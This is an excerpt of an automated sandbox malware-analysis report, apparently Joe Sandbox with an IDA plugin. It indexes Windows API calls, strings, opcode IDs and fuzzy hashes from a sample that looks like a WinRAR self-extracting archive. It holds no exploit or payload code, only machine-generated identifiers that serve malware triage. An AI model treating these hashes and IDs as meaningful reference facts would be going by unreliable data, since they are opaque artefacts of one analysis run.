                                        • API String ID: 3906539128-0
                                        • Opcode ID: debd1dd4d55c26789cfd8fe247b6fb9a38a9c6924b6a058f3fe3755c6a3bf372
                                        • Instruction ID: c5a38ed8323a4e299bf5284c9db78d3a4d30835c3a436c53b00c32d64551d83b
                                        • Opcode Fuzzy Hash: debd1dd4d55c26789cfd8fe247b6fb9a38a9c6924b6a058f3fe3755c6a3bf372
                                        • Instruction Fuzzy Hash: CC31E57595121DABCB61DF25DD89B9CBBB8BF08310F5042EAE81CA7250EB309F918F44
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction ID: 2f5a820267974a704f8c24d38be7b7222e16c5d8b451c5a50a3a97ed9e615620
                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                        • Instruction Fuzzy Hash: 46023D71E102199BDF14DFA9C8806ADF7F6EF88354F258269D919EB384D730AE51CB80
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 002EAF35
                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,0030E72C,?,?), ref: 002EAF84
                                        Similarity
                                        • API ID: FormatInfoLocaleNumber
                                        • String ID:
                                        • API String ID: 2169056816-0
                                        • Opcode ID: 64712935d4421c73937dd4a484c3f267f73bb20f9c8d4d23eb1301341e57515d
                                        • Instruction ID: 2a9d07b8b38673840af3112cf67d558972d4e12835454e872d0fef6923a13048
                                        • Opcode Fuzzy Hash: 64712935d4421c73937dd4a484c3f267f73bb20f9c8d4d23eb1301341e57515d
                                        • Instruction Fuzzy Hash: AA017C3A250358AED7229F75EC45F9BB7BCEF08B10F404426FA05A7190E370A925CBA5
                                        APIs
                                        • GetLastError.KERNEL32(002D6DDF,00000000,00000400), ref: 002D6C74
                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 002D6C95
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 520b739d263f153ee77dd9f60f3be9f2c823a011c798ff08b92bb7e007d99cd3
                                        • Instruction ID: e65f2fce7231a95cf8d3c5d9d086a6dd24bf954dc41703bdae176f9cb1527f98
                                        • Opcode Fuzzy Hash: 520b739d263f153ee77dd9f60f3be9f2c823a011c798ff08b92bb7e007d99cd3
                                        • Instruction Fuzzy Hash: F7D0C731359301BFFA110F614D0EF5A7B5DBF45B51F14C4067755D40E0C6759824A615
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003019EF,?,?,00000008,?,?,0030168F,00000000), ref: 00301C21
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        APIs
                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002EF66A
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: gj
                                        • API String ID: 0-4203073231
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,002EF3A5), ref: 002EF9DA
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        APIs
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1065bd207500e145f1d0899f184ae0abf24cd712fda2bd82c28fd03cbb51a387
                                        • Instruction ID: 5faa7adb835c02cb7ccca5c19b3c24624b1dee576a5c6b568cb15183750f090e
                                        • Opcode Fuzzy Hash: 1065bd207500e145f1d0899f184ae0abf24cd712fda2bd82c28fd03cbb51a387
                                        • Instruction Fuzzy Hash: 4951E3315093D58FC702CF39C65046EBFE0AE9A314F4949AEE4DA5B343C221DE5ACB66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d5dc123dce90837f110b04ee0c43a8cabb3cafd52148ee8e99a9c344ac55854
                                        • Instruction ID: be1e5e1ddc408d2a7165dc2df00394c752b377812fd8eade5ed223a59cb4d088
                                        • Opcode Fuzzy Hash: 7d5dc123dce90837f110b04ee0c43a8cabb3cafd52148ee8e99a9c344ac55854
                                        • Instruction Fuzzy Hash: 8E51E0B1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E7340D734E959CB96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction ID: 7a19bc2680941c7ed9878d1835119465ab83a7abbd4dbbd5b91f0e090427fb80
                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                        • Instruction Fuzzy Hash: 683113B1A247468FCB14DF29C85526ABBE0FB95301F44492DE889C7742C738EE1ACF91
                                        APIs
                                        • _swprintf.LIBCMT ref: 002DE30E
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00311030,00000200,002DD928,00000000,?,00000050,00311030), ref: 002E1DC4
                                        • _strlen.LIBCMT ref: 002DE32F
                                        • SetDlgItemTextW.USER32(?,0030E274,?), ref: 002DE38F
                                        • GetWindowRect.USER32(?,?), ref: 002DE3C9
                                        • GetClientRect.USER32(?,?), ref: 002DE3D5
                                        • GetWindowLongW.USER32(?,000000F0), ref: 002DE475
                                        • GetWindowRect.USER32(?,?), ref: 002DE4A2
                                        • SetWindowTextW.USER32(?,?), ref: 002DE4DB
                                        • GetSystemMetrics.USER32(00000008), ref: 002DE4E3
                                        • GetWindow.USER32(?,00000005), ref: 002DE4EE
                                        • GetWindowRect.USER32(00000000,?), ref: 002DE51B
                                        • GetWindow.USER32(00000000,00000002), ref: 002DE58D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                        • String ID: $%s:$CAPTION$d$t0
                                        • API String ID: 2407758923-3906022979
                                        • Opcode ID: fe5e76b987007dad0e57cfd3bd5c9460d478f85c4e67359fd7b5ef7568bb7991
                                        • Instruction ID: 6ccf42058834a8539f159a29e06f9c9ff39555a78d324356be56f0a543ef559c
                                        • Opcode Fuzzy Hash: fe5e76b987007dad0e57cfd3bd5c9460d478f85c4e67359fd7b5ef7568bb7991
                                        • Instruction Fuzzy Hash: C981B071608301AFD711EF68CD89A6BBBECEF88704F05491EFA84D7290D634ED058B52
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 002FCB66
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC71E
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC730
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC742
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC754
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC766
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC778
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC78A
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC79C
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7AE
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7C0
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7D2
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7E4
                                          • Part of subcall function 002FC701: _free.LIBCMT ref: 002FC7F6
                                        • _free.LIBCMT ref: 002FCB5B
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FCB7D
                                        • _free.LIBCMT ref: 002FCB92
                                        • _free.LIBCMT ref: 002FCB9D
                                        • _free.LIBCMT ref: 002FCBBF
                                        • _free.LIBCMT ref: 002FCBD2
                                        • _free.LIBCMT ref: 002FCBE0
                                        • _free.LIBCMT ref: 002FCBEB
                                        • _free.LIBCMT ref: 002FCC23
                                        • _free.LIBCMT ref: 002FCC2A
                                        • _free.LIBCMT ref: 002FCC47
                                        • _free.LIBCMT ref: 002FCC5F
                                        Strings
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID: h0
                                        • API String ID: 161543041-1489814411
                                        • Opcode ID: e70e5f55997bba2fa5c0cc4663e004dfdc058fbfb854fed137172edd733ae82a
                                        • Instruction ID: 977be7a03a726da845b11d80cdc16feb8a4cbc080e4ba92e7fbc0123577ef97a
                                        • Opcode Fuzzy Hash: e70e5f55997bba2fa5c0cc4663e004dfdc058fbfb854fed137172edd733ae82a
                                        • Instruction Fuzzy Hash: 61313D3162020E9FDB25AE38DA45B7AF7E9AF113D4F24443AE758D6191DE31A860CB10
                                        APIs
                                        • _free.LIBCMT ref: 002F9705
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002F9711
                                        • _free.LIBCMT ref: 002F971C
                                        • _free.LIBCMT ref: 002F9727
                                        • _free.LIBCMT ref: 002F9732
                                        • _free.LIBCMT ref: 002F973D
                                        • _free.LIBCMT ref: 002F9748
                                        • _free.LIBCMT ref: 002F9753
                                        • _free.LIBCMT ref: 002F975E
                                        • _free.LIBCMT ref: 002F976C
                                        Strings
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: 0d0
                                        • API String ID: 776569668-4234322573
                                        • Opcode ID: 200b4296ac40f045769986cf8c8057903a0118b3f14ccb624c74b90ad8d305b2
                                        • Instruction ID: bdbec393ed3ee304dac49ae6da684fe6dc6ec1921b6ccff7d9c324657a2ff0b5
                                        • Opcode Fuzzy Hash: 200b4296ac40f045769986cf8c8057903a0118b3f14ccb624c74b90ad8d305b2
                                        • Instruction Fuzzy Hash: C211A47612010DAFCB01EF64C842DE9BBB5EF153D0B5154A1FB088F262DE32DA609F84
                                        APIs
                                        • _wcslen.LIBCMT ref: 002E9736
                                        • _wcslen.LIBCMT ref: 002E97D6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 002E97E5
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 002E9806
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002E982D
                                        Strings
                                        Similarity
                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                        • String ID: Fjun.$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                        • API String ID: 1777411235-3726714326
                                        • Opcode ID: 702819b43036f65aaefbea7a6e9d983e563a5647b3250aa561b0edd7f27f21cd
                                        • Instruction ID: 68d2e5af2b3e9924f2cf9bd8e9578b3ea86b91867a51195a18b07e41b8079789
                                        • Opcode Fuzzy Hash: 702819b43036f65aaefbea7a6e9d983e563a5647b3250aa561b0edd7f27f21cd
                                        • Instruction Fuzzy Hash: 4931AE321683463BE725BF329C06FAFB79CDF42350F10011FF601921D1EB608A688BA5
                                        APIs
                                        • GetWindow.USER32(?,00000005), ref: 002ED6C1
                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 002ED6ED
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 002ED709
                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 002ED720
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 002ED734
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 002ED75D
                                        • DeleteObject.GDI32(00000000), ref: 002ED764
                                        • GetWindow.USER32(00000000,00000002), ref: 002ED76D
                                        Strings
                                        Similarity
                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                        • String ID: STATIC
                                        • API String ID: 3820355801-1882779555
                                        • Opcode ID: 451fec43f3c768610b7b7e64f115df948ca90d3c966350ecc720467d10bc5e11
                                        • Instruction ID: 4090f891a75bc36bc234b84bc5859e97719097982085d79801954003e775ce9a
                                        • Opcode Fuzzy Hash: 451fec43f3c768610b7b7e64f115df948ca90d3c966350ecc720467d10bc5e11
                                        • Instruction Fuzzy Hash: 381136765D03917BE7227F729C8AFAFB65CAF00711F808121FA52A2091DA748B154AA2
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 322700389-393685449
                                        • Opcode ID: 8be25c6cadfa9f23e871e7d840317df6bc6366f2e0b23a0ff0f192add5c0013a
                                        • Instruction ID: fba5990f4e01620d8f569783d05cdc92af6a11b7fda1ab3574c18087e32cd27d
                                        • Opcode Fuzzy Hash: 8be25c6cadfa9f23e871e7d840317df6bc6366f2e0b23a0ff0f192add5c0013a
                                        • Instruction Fuzzy Hash: E8B1477182020EEFCF25DFA4C8819BEFBB5BF15390B14416AEA056B212D731DA65CF91
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n.
                                        • API String ID: 3519838083-795039805
                                        • Opcode ID: b98f8d1cf4cf63794f7130278d7531fee7e42a0a87b1a5427683d97031f8a57c
                                        • Instruction ID: dad2a1082ae91e9dee71b3c96701193e6077f5670aeae2a0c1fd74204b61383f
                                        • Opcode Fuzzy Hash: b98f8d1cf4cf63794f7130278d7531fee7e42a0a87b1a5427683d97031f8a57c
                                        • Instruction Fuzzy Hash: C6716971A11219EFDB15DFA4C8A5DAFB7BDFF48710B14055AE412A73A0CB30AE01CB60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D6FAA
                                        • _wcslen.LIBCMT ref: 002D7013
                                        • _wcslen.LIBCMT ref: 002D7084
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                        Strings
                                        Similarity
                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                        • API String ID: 3122303884-3508440684
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EB610
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 002EB637
                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 002EB650
                                        • SetWindowTextW.USER32(?,?), ref: 002EB661
                                        • GetDlgItem.USER32(?,00000065), ref: 002EB66A
                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 002EB67E
                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 002EB694
                                        Strings
                                        Similarity
                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                        • String ID: LICENSEDLG
                                        • API String ID: 3214253823-2177901306
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,761DE604,00000001,00000000,00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFD99
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE14
                                        • SysAllocString.OLEAUT32(00000000), ref: 002EFE1F
                                        • _com_issue_error.COMSUPP ref: 002EFE48
                                        • _com_issue_error.COMSUPP ref: 002EFE52
                                        • GetLastError.KERNEL32(80070057,761DE604,00000001,00000000,00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE57
                                        • _com_issue_error.COMSUPP ref: 002EFE6A
                                        • GetLastError.KERNEL32(00000000,?,?,002DAF6C,ROOT\CIMV2), ref: 002EFE80
                                        • _com_issue_error.COMSUPP ref: 002EFE93
                                        Similarity
                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                        • String ID:
                                        • API String ID: 1353541977-0
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D9387
                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 002D93AA
                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 002D93C9
                                          • Part of subcall function 002DC29A: _wcslen.LIBCMT ref: 002DC2A2
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        • _swprintf.LIBCMT ref: 002D9465
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • MoveFileW.KERNEL32(?,?), ref: 002D94D4
                                        • MoveFileW.KERNEL32(?,?), ref: 002D9514
                                        Strings
                                        Similarity
                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                        • String ID: rtmp%d
                                        • API String ID: 3726343395-3303766350
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: U.$p.$z.
                                        • API String ID: 176396367-415434762
                                        APIs
                                        • ShowWindow.USER32(?,00000000), ref: 002E9EEE
                                        • GetWindowRect.USER32(?,00000000), ref: 002E9F44
                                        • ShowWindow.USER32(?,00000005,00000000), ref: 002E9FDB
                                        • SetWindowTextW.USER32(?,00000000), ref: 002E9FE3
                                        • ShowWindow.USER32(00000000,00000005), ref: 002E9FF9
                                        Strings
                                        Similarity
                                        • API ID: Window$Show$RectText
                                        • String ID: .$RarHtmlClassName
                                        • API String ID: 3937224194-3232936001
                                        APIs
                                        • __aulldiv.LIBCMT ref: 002E122E
                                          • Part of subcall function 002DB146: GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 002E1251
                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 002E1263
                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 002E1274
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1284
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1294
                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 002E12CF
                                        • __aullrem.LIBCMT ref: 002E1379
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                        • String ID:
                                        • API String ID: 1247370737-0
                                        APIs
                                        • _swprintf.LIBCMT ref: 002D2536
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                        Strings
                                        Similarity
                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                        • String ID: ;%u$x%u$xc%u
                                        • API String ID: 3053425827-2277559157
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: </p>$</style>$<br>$<style>$>
                                        • API String ID: 176396367-3568243669
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,002FFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 002FF6CF
                                        • __fassign.LIBCMT ref: 002FF74A
                                        • __fassign.LIBCMT ref: 002FF765
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 002FF78B
                                        • WriteFile.KERNEL32(?,00000000,00000000,002FFE02,00000000,?,?,?,?,?,?,?,?,?,002FFE02,00000000), ref: 002FF7AA
                                        • WriteFile.KERNEL32(?,00000000,00000001,002FFE02,00000000,?,?,?,?,?,?,?,?,?,002FFE02,00000000), ref: 002FF7E3
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 002ECE9D
                                          • Part of subcall function 002DB690: _wcslen.LIBCMT ref: 002DB696
                                        • _swprintf.LIBCMT ref: 002ECED1
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • SetDlgItemTextW.USER32(?,00000066,0031946A), ref: 002ECEF1
                                        • _wcschr.LIBVCRUNTIME ref: 002ECF22
                                        • EndDialog.USER32(?,00000001), ref: 002ECFFE
                                        Strings
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                        • String ID: %s%s%u
                                        • API String ID: 689974011-1360425832
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 002F2937
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 002F293F
                                        • _ValidateLocalCookies.LIBCMT ref: 002F29C8
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 002F29F3
                                        • _ValidateLocalCookies.LIBCMT ref: 002F2A48
                                        Strings
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                        • API String ID: 176396367-3743748572
                                        APIs
                                          • Part of subcall function 002FC868: _free.LIBCMT ref: 002FC891
                                        • _free.LIBCMT ref: 002FC8F2
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FC8FD
                                        • _free.LIBCMT ref: 002FC908
                                        • _free.LIBCMT ref: 002FC95C
                                        • _free.LIBCMT ref: 002FC967
                                        • _free.LIBCMT ref: 002FC972
                                        • _free.LIBCMT ref: 002FC97D
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,002EE669,002EE5CC,002EE86D), ref: 002EE605
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 002EE61B
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 002EE630
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        APIs
                                        • _free.LIBCMT ref: 002F891E
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002F8930
                                        • _free.LIBCMT ref: 002F8943
                                        • _free.LIBCMT ref: 002F8954
                                        • _free.LIBCMT ref: 002F8965
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: p0
                                        • API String ID: 776569668-140255176
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E14C2
                                          • Part of subcall function 002DB146: GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002E14E6
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002E1500
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002E1513
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1523
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1533
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        APIs
                                        • GetLastError.KERNEL32(?,?,002F2AF1,002F02FC,002EFA34), ref: 002F2B08
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002F2B16
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002F2B2F
                                        • SetLastError.KERNEL32(00000000,002F2AF1,002F02FC,002EFA34), ref: 002F2B81
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        APIs
                                        • GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                        • _free.LIBCMT ref: 002F981C
